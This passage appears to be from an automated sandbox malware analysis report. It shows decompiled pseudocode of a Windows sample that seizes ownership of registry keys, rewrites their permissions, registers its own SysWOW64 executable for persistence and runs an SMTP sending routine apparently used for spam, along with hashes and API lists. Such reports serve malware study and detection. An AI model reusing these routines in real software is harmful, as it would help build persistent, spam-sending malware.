								_t120 = InitializeSecurityDescriptor(_t173, 1);
								__eflags = _t120;
								if(_t120 != 0) {
									_t122 = SetSecurityDescriptorDacl(_t173, 1, _v32, 0);
									__eflags = _t122;
									if(_t122 != 0) {
										_t123 = RegSetKeySecurity(_v28, 4, _t173);
										__eflags = _t123;
										if(_t123 == 0) {
											_v12 = 1;
										}
									}
								}
								LocalFree(_t173);
							}
							goto L47;
						}
						__eflags =  *0x412cc0; // 0x1
						if(__eflags == 0) {
							goto L41;
						}
						_v12 = 0;
						_t125 = RegOpenKeyExA(_a4, _a8, 0, 0x103,  &_v12);
						__eflags = _t125;
						if(_t125 != 0) {
							goto L41;
						}
						_t158 = "C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe";
						_t126 = _t158;
						_t174 =  &(_t126[1]);
						do {
							_t161 =  *_t126;
							_t126 =  &(_t126[1]);
							__eflags = _t161;
						} while (_t161 != 0);
						_t130 = RegSetValueExA(_v12, E00402544(0x4122f8, 0x4106dc, 0xa, 0xe4, 0xc8), 0, 2, _t158, _t126 - _t174 + 1);
						__eflags = _t130;
						if(_t130 == 0) {
							 *0x412cc0 = 0;
						}
						goto L41;
					}
					_t146 = EqualSid( &_v132, _v16);
					__eflags = _t146;
					if(_t146 != 0) {
						goto L12;
					}
					_v12 = 1;
					_t175 = LocalAlloc(0x40, 0x14);
					__eflags = _t175;
					if(_t175 != 0) {
						_t148 = InitializeSecurityDescriptor(_t175, 1);
						__eflags = _t148;
						if(_t148 != 0) {
							_t151 = SetSecurityDescriptorOwner(_t175,  &_v132, 0);
							__eflags = _t151;
							if(_t151 != 0) {
								RegSetKeySecurity(_v28, 1, _t175);
							}
						}
						LocalFree(_t175);
					}
					goto L12;
				}
			}



















































                                                                                0x00407aae
                                                                                0x00407ab4
                                                                                0x00407ab7
                                                                                0x00407ac2
                                                                                0x00000000
                                                                                0x00407ac4
                                                                                0x00407adc
                                                                                0x00407adf
                                                                                0x00407ae5
                                                                                0x00407ae7
                                                                                0x00407da7
                                                                                0x00407daa
                                                                                0x00000000
                                                                                0x00407aed
                                                                                0x00407b0c
                                                                                0x00407b13
                                                                                0x00407b16
                                                                                0x00407b1c
                                                                                0x00407b1e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407b34
                                                                                0x00407b3b
                                                                                0x00407b41
                                                                                0x00407b43
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407b59
                                                                                0x00407b5f
                                                                                0x00407b61
                                                                                0x00407bb8
                                                                                0x00407bcb
                                                                                0x00407bce
                                                                                0x00407bd4
                                                                                0x00407bd6
                                                                                0x00407da6
                                                                                0x00000000
                                                                                0x00407da6
                                                                                0x00407bdc
                                                                                0x00407bdf
                                                                                0x00407be1
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407be9
                                                                                0x00407beb
                                                                                0x00407bee
                                                                                0x00407bf2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407bf8
                                                                                0x00407bf8
                                                                                0x00407c00
                                                                                0x00407c06
                                                                                0x00407c08
                                                                                0x00407cc6
                                                                                0x00407cc6
                                                                                0x00407cc6
                                                                                0x00407cc6
                                                                                0x00000000
                                                                                0x00407cc6
                                                                                0x00407c14
                                                                                0x00407c16
                                                                                0x00407c19
                                                                                0x00407c1b
                                                                                0x00407c4f
                                                                                0x00407c4f
                                                                                0x00407c52
                                                                                0x00407c57
                                                                                0x00407c5e
                                                                                0x00407c5e
                                                                                0x00407c5e
                                                                                0x00407c66
                                                                                0x00407c6c
                                                                                0x00407c6f
                                                                                0x00407c71
                                                                                0x00407c86
                                                                                0x00407c73
                                                                                0x00407c78
                                                                                0x00407c7f
                                                                                0x00407c7f
                                                                                0x00407c8b
                                                                                0x00407c8e
                                                                                0x00407c90
                                                                                0x00407c93
                                                                                0x00407c96
                                                                                0x00407c96
                                                                                0x00407c9d
                                                                                0x00407c9f
                                                                                0x00407ca7
                                                                                0x00407ca7
                                                                                0x00407ca9
                                                                                0x00407cac
                                                                                0x00407cb2
                                                                                0x00407cb2
                                                                                0x00407cb5
                                                                                0x00407cc3
                                                                                0x00000000
                                                                                0x00407ca1
                                                                                0x00407ca1
                                                                                0x00407ca5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407ca5
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407c1d
                                                                                0x00407c1d
                                                                                0x00407c27
                                                                                0x00407c2d
                                                                                0x00407c2f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407c31
                                                                                0x00407c32
                                                                                0x00407c34
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407c34
                                                                                0x00407c36
                                                                                0x00407c38
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407c40
                                                                                0x00407c46
                                                                                0x00407cc9
                                                                                0x00407cc9
                                                                                0x00407cd0
                                                                                0x00407cd0
                                                                                0x00407cd9
                                                                                0x00407cdc
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407ce2
                                                                                0x00407ce8
                                                                                0x00407d5a
                                                                                0x00407d61
                                                                                0x00407d6a
                                                                                0x00407d6c
                                                                                0x00407d6e
                                                                                0x00407d72
                                                                                0x00407d78
                                                                                0x00407d7a
                                                                                0x00407d82
                                                                                0x00407d88
                                                                                0x00407d8a
                                                                                0x00407d92
                                                                                0x00407d98
                                                                                0x00407d9a
                                                                                0x00407d9c
                                                                                0x00407d9c
                                                                                0x00407d9a
                                                                                0x00407d8a
                                                                                0x00407da0
                                                                                0x00407da0
                                                                                0x00000000
                                                                                0x00407d6e
                                                                                0x00407cea
                                                                                0x00407cf0
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407cff
                                                                                0x00407d05
                                                                                0x00407d0b
                                                                                0x00407d0d
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407d0f
                                                                                0x00407d14
                                                                                0x00407d16
                                                                                0x00407d19
                                                                                0x00407d19
                                                                                0x00407d1b
                                                                                0x00407d1c
                                                                                0x00407d1c
                                                                                0x00407d4a
                                                                                0x00407d50
                                                                                0x00407d52
                                                                                0x00407d54
                                                                                0x00407d54
                                                                                0x00000000
                                                                                0x00407d52
                                                                                0x00407b6a
                                                                                0x00407b70
                                                                                0x00407b72
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00407b7b
                                                                                0x00407b84
                                                                                0x00407b86
                                                                                0x00407b88
                                                                                0x00407b8c
                                                                                0x00407b92
                                                                                0x00407b94
                                                                                0x00407b9c
                                                                                0x00407ba2
                                                                                0x00407ba4
                                                                                0x00407bab
                                                                                0x00407bab
                                                                                0x00407ba4
                                                                                0x00407bb2
                                                                                0x00407bb2
                                                                                0x00000000
                                                                                0x00407b88

                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(000000E4,00000022,00000000,000E0100,00000000,00000000), ref: 00407ABA
                                                                                • GetUserNameA.ADVAPI32(?,?), ref: 00407ADF
                                                                                • LookupAccountNameA.ADVAPI32(00000000,?,?,0041070C,?,?,?), ref: 00407B16
                                                                                • RegGetKeySecurity.ADVAPI32(00000000,00000005,?,?), ref: 00407B3B
                                                                                • GetSecurityDescriptorOwner.ADVAPI32(?,00000022,80000002), ref: 00407B59
                                                                                • EqualSid.ADVAPI32(?,00000022), ref: 00407B6A
                                                                                • LocalAlloc.KERNEL32(00000040,00000014), ref: 00407B7E
                                                                                • InitializeSecurityDescriptor.ADVAPI32(00000000,00000001), ref: 00407B8C
                                                                                • SetSecurityDescriptorOwner.ADVAPI32(00000000,?,00000000), ref: 00407B9C
                                                                                • RegSetKeySecurity.ADVAPI32(00000000,00000001,00000000), ref: 00407BAB
                                                                                • LocalFree.KERNEL32(00000000), ref: 00407BB2
                                                                                • GetSecurityDescriptorDacl.ADVAPI32(?,00407FC9,?,00000000), ref: 00407BCE
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Security$Descriptor$LocalNameOwner$AccountAllocDaclEqualFreeInitializeLookupOpenUser
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe$D
                                                                                • API String ID: 2976863881-60433687
                                                                                • Opcode ID: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                • Instruction ID: e17c9e5f60e255820364911aa1186e0accab4a2e7248257c6285c946b731c67d
                                                                                • Opcode Fuzzy Hash: d4f479c9f78d504b8da3df740f472ce51a34dde969fc05e485fb9939b8f25359
                                                                                • Instruction Fuzzy Hash: 6FA14D71D04219ABDB119FA0DD44EEF7B78FF48304F04807AE505F2290D779AA85CB69
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406511 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 182COMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 57%
                                                                                			E00406511(void* __ecx) {
				signed int _t75;
				signed int _t76;
				int _t78;
				void* _t83;
				signed int _t93;
				void* _t95;
				signed int _t99;
				int _t101;
				int _t115;
				int _t117;
				void* _t118;
				void* _t119;
				void* _t120;
				void* _t122;
				intOrPtr _t135;
				intOrPtr* _t137;
				void* _t139;
				void* _t141;
				void* _t143;
				void* _t144;
				void* _t152;

				_t122 = __ecx;
				_t139 = _t141 - 0x74;
				_t75 =  *(_t139 + 0x7c);
				_t135 =  *((intOrPtr*)(_t75 + 4));
				_t76 =  *_t75;
				 *(_t139 + 0x7c) = _t76;
				_t78 = wsprintfA(_t139 - 0x898, "\nver=%d date=%s %s\nc=%08x a=%p", 0x61, "Jan 13 2018", "12:08:32",  *_t76,  *((intOrPtr*)(_t76 + 0xc)));
				_t143 = _t141 - 0x90c + 0x1c;
				_t117 = _t78;
				if(IsBadReadPtr( *( *(_t139 + 0x7c) + 0xc), 8) != 0) {
					E0040E318();
					ExitProcess(0);
				}
				_t83 =  *( *(_t139 + 0x7c) + 0xc);
				__imp__#8( *((intOrPtr*)(_t83 + 4)), E00406511);
				__imp__#8();
				_t118 = _t117 + wsprintfA(_t139 + _t117 - 0x898, " va=%08X%08X uef=%p",  *( *(_t139 + 0x7c) + 0xc),  *( *( *(_t139 + 0x7c) + 0xc)), _t83);
				_t119 = _t118 + wsprintfA(_t139 + _t118 - 0x898, "\n_ax=%p\t_bx=%p\t_cx=%p\t_dx=%p\t_si=%p\t_di=%p\t_bp=%p\t_sp=%p\n",  *((intOrPtr*)(_t135 + 0xb0)),  *((intOrPtr*)(_t135 + 0xa4)),  *((intOrPtr*)(_t135 + 0xac)),  *((intOrPtr*)(_t135 + 0xa8)),  *((intOrPtr*)(_t135 + 0xa0)),  *((intOrPtr*)(_t135 + 0x9c)),  *((intOrPtr*)(_t135 + 0xb4)),  *((intOrPtr*)(_t135 + 0xc4)));
				E0040EE2A(_t122, _t139 - 0x98, 0, 0x108);
				_t144 = _t143 + 0x48;
				 *((intOrPtr*)(_t139 - 0x98)) =  *((intOrPtr*)(_t135 + 0xb8));
				_t93 = 3;
				_push(0);
				_push(0);
				 *(_t139 - 0x8c) = _t93;
				 *((intOrPtr*)(_t139 - 0x94)) = 0;
				_push(0);
				 *(_t139 - 0x5c) = _t93;
				_push(0);
				 *((intOrPtr*)(_t139 - 0x68)) =  *((intOrPtr*)(_t135 + 0xc4));
				 *((intOrPtr*)(_t139 - 0x64)) = 0;
				_t130 =  *((intOrPtr*)(_t135 + 0xb4));
				 *(_t139 - 0x6c) = _t93;
				 *(_t139 + 0x7c) = _t93;
				_push(_t135);
				_push(_t139 - 0x98);
				 *((intOrPtr*)(_t139 - 0x78)) =  *((intOrPtr*)(_t135 + 0xb4));
				 *((intOrPtr*)(_t139 - 0x74)) = 0;
				_push(0);
				while(1) {
					_t95 = GetCurrentProcess();
					__imp__StackWalk64(0x14c, _t95);
					if(_t95 == 0) {
						break;
					}
					_t95 = 0;
					if( *(_t139 + 0x7c) != 0) {
						if( *((intOrPtr*)(_t139 - 0x88)) != 0) {
							_t115 = wsprintfA(_t139 + _t119 - 0x898, "ret=%p\tp1=%p\tp2=%p\tp3=%p\tp4=%p\n",  *((intOrPtr*)(_t139 - 0x88)),  *((intOrPtr*)(_t139 - 0x40)),  *((intOrPtr*)(_t139 - 0x38)),  *((intOrPtr*)(_t139 - 0x30)),  *((intOrPtr*)(_t139 - 0x28)));
							_t144 = _t144 + 0x1c;
							_t119 = _t119 + _t115;
							_t95 = 0;
						}
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) - 1;
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t95);
						_push(_t135);
						_push(_t139 - 0x98);
						_push(_t95);
						continue;
					}
					break;
				}
				 *(_t139 + 0x7c) = _t95;
				_t120 = _t119 + wsprintfA(_t139 + _t119 - 0x898, "plgs:");
				 *(_t139 + 0x70) =  *(_t139 + 0x70) & 0x00000000;
				do {
					_t137 = 0x412c40 +  *(_t139 + 0x70) * 4;
					if( *_t137 != 0) {
						_t99 =  *(_t139 + 0x7c) & 0x80000007;
						if(_t99 < 0) {
							_t152 = (_t99 - 0x00000001 | 0xfffffff8) + 1;
						}
						if(_t152 == 0) {
							_t120 = _t120 + wsprintfA(_t139 + _t120 - 0x898, "\n");
						}
						_t101 = wsprintfA(_t139 + _t120 - 0x898, "\t%d=%p",  *(_t139 + 0x70),  *_t137);
						_t144 = _t144 + 0x10;
						_t120 = _t120 + _t101;
						 *(_t139 + 0x7c) =  *(_t139 + 0x7c) + 1;
					}
					 *(_t139 + 0x70) =  *(_t139 + 0x70) + 1;
				} while ( *(_t139 + 0x70) < 0x20);
				wsprintfA(_t139 + _t120 - 0x898, "\n");
				E0040E8A1(_t130, 1, "localcfg", "except_info", _t139 - 0x898);
				E0040E318();
				return 1;
			}
























                                                                                0x00406511
                                                                                0x00406512
                                                                                0x0040651c
                                                                                0x00406521
                                                                                0x00406524
                                                                                0x00406532
                                                                                0x0040654d
                                                                                0x0040654f
                                                                                0x00406552
                                                                                0x00406564
                                                                                0x0040674e
                                                                                0x00406755
                                                                                0x00406755
                                                                                0x0040656d
                                                                                0x00406578
                                                                                0x00406587
                                                                                0x004065a3
                                                                                0x004065e3
                                                                                0x004065ee
                                                                                0x004065f9
                                                                                0x00406600
                                                                                0x00406606
                                                                                0x00406607
                                                                                0x00406608
                                                                                0x00406609
                                                                                0x0040660f
                                                                                0x0040661b
                                                                                0x0040661c
                                                                                0x0040661f
                                                                                0x00406620
                                                                                0x00406623
                                                                                0x00406626
                                                                                0x0040662c
                                                                                0x0040662f
                                                                                0x00406632
                                                                                0x00406639
                                                                                0x0040663a
                                                                                0x0040663d
                                                                                0x00406640
                                                                                0x0040668a
                                                                                0x0040668a
                                                                                0x00406696
                                                                                0x0040669e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406643
                                                                                0x00406648
                                                                                0x00406650
                                                                                0x00406671
                                                                                0x00406673
                                                                                0x00406676
                                                                                0x00406678
                                                                                0x00406678
                                                                                0x0040667a
                                                                                0x0040667d
                                                                                0x0040667e
                                                                                0x0040667f
                                                                                0x00406680
                                                                                0x00406681
                                                                                0x00406688
                                                                                0x00406689
                                                                                0x00000000
                                                                                0x00406689
                                                                                0x00000000
                                                                                0x00406648
                                                                                0x004066a0
                                                                                0x004066b3
                                                                                0x004066b5
                                                                                0x004066ba
                                                                                0x004066bd
                                                                                0x004066c7
                                                                                0x004066cc
                                                                                0x004066d1
                                                                                0x004066d7
                                                                                0x004066d7
                                                                                0x004066d8
                                                                                0x004066eb
                                                                                0x004066eb
                                                                                0x004066ff
                                                                                0x00406701
                                                                                0x00406704
                                                                                0x00406706
                                                                                0x00406706
                                                                                0x00406709
                                                                                0x0040670c
                                                                                0x0040671f
                                                                                0x00406734
                                                                                0x0040673c
                                                                                0x0040674b

                                                                                APIs
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: wsprintf$Processhtonl$CurrentExitReadStackWalk64
                                                                                • String ID: %d=%p$_ax=%p_bx=%p_cx=%p_dx=%p_si=%p_di=%p_bp=%p_sp=%p$ver=%d date=%s %sc=%08x a=%p$ va=%08X%08X uef=%p$12:08:32$Jan 13 2018$except_info$localcfg$plgs:$ret=%pp1=%pp2=%pp3=%pp4=%p
                                                                                • API String ID: 2400214276-165278494
                                                                                • Opcode ID: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
                                                                                • Instruction ID: d0bbb1ce902d37c6012dbda67fcae0275dd4f0eb650f6cdd038f268f1af807dd
                                                                                • Opcode Fuzzy Hash: fbd2438e5a8d786474603689893f321f2aaf39c813a77a2b8649c1733411c7dd
                                                                                • Instruction Fuzzy Hash: FC615F72940208EFDB609FB4DC45FEA77E9FF08300F24846AF95DD2161DA7599908F58
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A7C1 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 299networkstringCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 56%
                                                                                			E0040A7C1(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16) {
				short _v129;
				char _v132;
				char _v1156;
				signed int _t59;
				int _t60;
				void* _t61;
				char* _t62;
				signed int _t63;
				void* _t65;
				signed int _t68;
				signed int _t74;
				signed int _t76;
				signed int _t78;
				signed int _t80;
				void* _t82;
				signed int _t85;
				signed int _t87;
				signed int _t92;
				void* _t96;
				intOrPtr _t102;
				signed int _t103;
				void* _t104;
				int _t121;
				intOrPtr _t123;
				void* _t124;
				CHAR* _t125;
				intOrPtr* _t126;
				intOrPtr* _t127;
				signed int _t129;
				void* _t130;
				void* _t131;

				_t102 = _a8;
				_t2 = _t102 - 1; // 0x0
				_t59 = _t2;
				_t125 =  &_v132;
				if(_t59 > 0xb) {
					L21:
					_t60 = lstrlenA(_t125);
					_t121 = _t60;
					_t126 = __imp__#19;
					_t61 =  *_t126(_a4, _t125, _t121, 0);
					if(_t61 == _t121) {
						__eflags = _t102 - 6;
						if(_t102 != 6) {
							L28:
							_t127 = __imp__#16;
							_t103 = 0;
							_push(0);
							_v1156 = 0;
							_v132 = 0;
							_push(0x3f6);
							_t62 =  &_v1156;
							while(1) {
								_t63 =  *_t127(_a4, _t62);
								__eflags = _t63;
								if(_t63 <= 0) {
									break;
								}
								_t103 = _t103 + _t63;
								__eflags = _t103 - 0x1f4;
								if(_t103 > 0x1f4) {
									wsprintfA(_a16, "Too big smtp respons (%d bytes)\n", _t103);
									_push(6);
									L72:
									_pop(_t65);
									return _t65;
								}
								__eflags = _v132;
								 *((char*)(_t130 + _t103 - 0x480)) = 0;
								if(_v132 != 0) {
									L33:
									_t68 = E0040EE95( &_v1156,  &_v132);
									__eflags = _t68;
									if(_t68 != 0) {
										break;
									}
									L34:
									_t92 = 0x3f6 - _t103;
									__eflags = _t92;
									_push(0);
									_push(_t92);
									_t62 = _t130 + _t103 - 0x480;
									continue;
								}
								__eflags = _t103 - 3;
								if(_t103 <= 3) {
									goto L34;
								}
								E0040EE08( &_v132,  &_v1156, 4);
								_t131 = _t131 + 0xc;
								__eflags = _v132;
								_v129 = 0x20;
								if(_v132 == 0) {
									goto L34;
								}
								goto L33;
							}
							_t123 = _a8;
							__eflags = _t123 - 7;
							if(_t123 == 7) {
								L23:
								_push(2);
								goto L72;
							}
							__eflags = _t103 - 5;
							if(_t103 <= 5) {
								E0040EF00(_a16, "Too small respons\n");
							} else {
								E0040EE08(_a16,  &_v1156, 0x76);
								_t131 = _t131 + 0xc;
								_a16[0x76] = 0;
							}
							__eflags = _t103 - 5;
							if(_t103 < 5) {
								L71:
								E0040EF00(_a16, "Incorrect respons");
								_push(7);
								goto L72;
							} else {
								__eflags =  *((char*)(_t130 + _t103 - 0x481)) - 0xa;
								if( *((char*)(_t130 + _t103 - 0x481)) != 0xa) {
									goto L71;
								}
								_t104 = E0040EDAC( &_v1156);
								__eflags = _t104 - 0xdc;
								if(_t104 == 0xdc) {
									L50:
									_t129 = 1;
									_t74 = E0040EE95( &_v1156, "ESMTP");
									__eflags = _t74;
									_t52 = _t74 != 0;
									__eflags = _t52;
									 *0x413668 = _t74 & 0xffffff00 | _t52;
									_t123 = 1;
									L51:
									__eflags = _t123 - 0xc;
									if(_t123 != 0xc) {
										L54:
										__eflags = _t129;
										if(_t129 != 0) {
											goto L23;
										}
										_t76 =  *0x413630; // 0x0
										__eflags = _t76;
										if(_t76 == 0) {
											L70:
											_push(0xb);
											goto L72;
										}
										__eflags =  *0x413634 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags =  *0x413638 - _t129; // 0x0
										if(__eflags == 0) {
											goto L70;
										}
										__eflags = _t123 - 4;
										if(_t123 != 4) {
											L61:
											_t78 = E0040A699( &_v1156,  *0x413634);
											__eflags = _t78;
											if(_t78 == 0) {
												_t80 = E0040A699( &_v1156,  *0x413638);
												__eflags = _t80;
												if(_t80 == 0) {
													__eflags = _t123 - 3;
													if(_t123 == 3) {
														L69:
														_t82 = E0040E819(1, "localcfg", "ip", E004030B5());
														_push( &_v132);
														_t85 = E0040EE95( &_v1156, E0040A7A3(_t82, _t82));
														__eflags = _t85;
														if(_t85 != 0) {
															goto L62;
														}
														goto L70;
													}
													__eflags = _t123 - 4;
													if(_t123 == 4) {
														goto L69;
													}
													__eflags = _t123 - 5;
													if(_t123 == 5) {
														goto L69;
													}
													__eflags = _t123 - 6;
													if(_t123 != 6) {
														goto L70;
													}
													goto L69;
												}
												_push(0xa);
												goto L72;
											}
											L62:
											_push(9);
											goto L72;
										}
										_t87 = E0040A699( &_v1156, _t76);
										__eflags = _t87;
										if(_t87 == 0) {
											goto L61;
										}
										_push(8);
										goto L72;
									}
									__eflags = _t104 - 0x217;
									if(_t104 != 0x217) {
										goto L54;
									}
									_push(0xf);
									goto L72;
								}
								__eflags = _t104 - 0xfa;
								if(_t104 == 0xfa) {
									goto L50;
								}
								__eflags = _t104 - 0x162;
								if(_t104 == 0x162) {
									goto L50;
								}
								__eflags = _t104 - 0xdd;
								if(_t104 == 0xdd) {
									goto L50;
								}
								__eflags = _t104 - 0x14e;
								if(_t104 == 0x14e) {
									goto L50;
								}
								__eflags = _t104 - 0xeb;
								if(_t104 == 0xeb) {
									goto L50;
								}
								_t129 = 0;
								goto L51;
							}
						}
						_t124 = 5;
						_t96 =  *_t126(_a4, "\r\n.\r\n", _t124, 0);
						__eflags = _t96 - _t124;
						if(_t96 == _t124) {
							goto L28;
						}
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t96, _t124);
						return _t124;
					}
					if(_t102 != 7) {
						wsprintfA(_a16, "Error sending command (sent = %d/%d)\n", _t61, _t121);
						_push(5);
						goto L72;
					}
					goto L23;
				}
				switch( *((intOrPtr*)(_t59 * 4 +  &M0040AB51))) {
					case 0:
						goto L28;
					case 1:
						_push(_a12);
						_t100 =  &_v132;
						if( *0x413668 == 0) {
							_push("helo %s\r\n");
						} else {
							_push("ehlo %s\r\n");
						}
						goto L4;
					case 2:
						_push(_a12);
						_push("mail from:<%s>\r\n");
						goto L14;
					case 3:
						_push(_a12);
						_push("rcpt to:<%s>\r\n");
						L14:
						__eax =  &_v132;
						L4:
						wsprintfA(_t100, ??);
						goto L20;
					case 4:
						_push(7);
						_push("data\r\n");
						goto L19;
					case 5:
						goto L21;
					case 6:
						_push(7);
						_push("quit\r\n");
						goto L19;
					case 7:
						goto L21;
					case 8:
						_push(0xd);
						_push("AUTH LOGIN\r\n");
						L19:
						__eax =  &_v132;
						_push( &_v132);
						__eax = E0040EE08();
						goto L20;
					case 9:
						__eax = _a12;
						_t9 = __eax + 1; // 0x1
						__edx = _t9;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						goto L9;
					case 0xa:
						__eax = _a12;
						_t15 = __eax + 1; // 0x1
						__edx = _t15;
						do {
							__cl =  *__eax;
							__eax = __eax + 1;
							__eflags = __cl;
						} while (__cl != 0);
						L9:
						__eax = __eax - __edx;
						 *((char*)(__ebp + __eax - 0x80)) = 0;
						L20:
						_t131 = _t131 + 0xc;
						goto L21;
				}
			}


































                                                                                0x0040a7cb
                                                                                0x0040a7cf
                                                                                0x0040a7cf
                                                                                0x0040a7d3
                                                                                0x0040a7d9
                                                                                0x0040a87d
                                                                                0x0040a87e
                                                                                0x0040a886
                                                                                0x0040a88d
                                                                                0x0040a893
                                                                                0x0040a897
                                                                                0x0040a8bf
                                                                                0x0040a8c2
                                                                                0x0040a8f2
                                                                                0x0040a8f2
                                                                                0x0040a8f8
                                                                                0x0040a8fa
                                                                                0x0040a900
                                                                                0x0040a906
                                                                                0x0040a909
                                                                                0x0040a90a
                                                                                0x0040a978
                                                                                0x0040a97c
                                                                                0x0040a97e
                                                                                0x0040a980
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a912
                                                                                0x0040a914
                                                                                0x0040a91a
                                                                                0x0040a9b9
                                                                                0x0040a9c2
                                                                                0x0040ab4a
                                                                                0x0040ab4a
                                                                                0x00000000
                                                                                0x0040ab4a
                                                                                0x0040a920
                                                                                0x0040a924
                                                                                0x0040a92c
                                                                                0x0040a954
                                                                                0x0040a95f
                                                                                0x0040a966
                                                                                0x0040a968
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a96a
                                                                                0x0040a96c
                                                                                0x0040a96c
                                                                                0x0040a96e
                                                                                0x0040a970
                                                                                0x0040a971
                                                                                0x00000000
                                                                                0x0040a971
                                                                                0x0040a92e
                                                                                0x0040a931
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a940
                                                                                0x0040a945
                                                                                0x0040a948
                                                                                0x0040a94c
                                                                                0x0040a952
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a952
                                                                                0x0040a982
                                                                                0x0040a985
                                                                                0x0040a988
                                                                                0x0040a89e
                                                                                0x0040a89e
                                                                                0x00000000
                                                                                0x0040a89e
                                                                                0x0040a98e
                                                                                0x0040a991
                                                                                0x0040a9d1
                                                                                0x0040a993
                                                                                0x0040a99f
                                                                                0x0040a9a7
                                                                                0x0040a9aa
                                                                                0x0040a9aa
                                                                                0x0040a9d8
                                                                                0x0040a9db
                                                                                0x0040ab39
                                                                                0x0040ab41
                                                                                0x0040ab48
                                                                                0x00000000
                                                                                0x0040a9e1
                                                                                0x0040a9e1
                                                                                0x0040a9e9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a9fb
                                                                                0x0040a9fe
                                                                                0x0040aa04
                                                                                0x0040aa32
                                                                                0x0040aa40
                                                                                0x0040aa41
                                                                                0x0040aa46
                                                                                0x0040aa49
                                                                                0x0040aa49
                                                                                0x0040aa4d
                                                                                0x0040aa52
                                                                                0x0040aa54
                                                                                0x0040aa54
                                                                                0x0040aa57
                                                                                0x0040aa68
                                                                                0x0040aa68
                                                                                0x0040aa6a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa70
                                                                                0x0040aa75
                                                                                0x0040aa77
                                                                                0x0040ab35
                                                                                0x0040ab35
                                                                                0x00000000
                                                                                0x0040ab35
                                                                                0x0040aa7d
                                                                                0x0040aa83
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa89
                                                                                0x0040aa8f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa95
                                                                                0x0040aa98
                                                                                0x0040aab4
                                                                                0x0040aac1
                                                                                0x0040aac8
                                                                                0x0040aaca
                                                                                0x0040aadd
                                                                                0x0040aae4
                                                                                0x0040aae6
                                                                                0x0040aaec
                                                                                0x0040aaef
                                                                                0x0040ab00
                                                                                0x0040ab12
                                                                                0x0040ab1a
                                                                                0x0040ab29
                                                                                0x0040ab31
                                                                                0x0040ab33
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040ab33
                                                                                0x0040aaf1
                                                                                0x0040aaf4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aaf6
                                                                                0x0040aaf9
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aafb
                                                                                0x0040aafe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aafe
                                                                                0x0040aae8
                                                                                0x00000000
                                                                                0x0040aae8
                                                                                0x0040aacc
                                                                                0x0040aacc
                                                                                0x00000000
                                                                                0x0040aacc
                                                                                0x0040aaa2
                                                                                0x0040aaa9
                                                                                0x0040aaab
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aaad
                                                                                0x00000000
                                                                                0x0040aaad
                                                                                0x0040aa59
                                                                                0x0040aa5f
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa61
                                                                                0x00000000
                                                                                0x0040aa61
                                                                                0x0040aa06
                                                                                0x0040aa0c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa0e
                                                                                0x0040aa14
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa16
                                                                                0x0040aa1c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa1e
                                                                                0x0040aa24
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040aa26
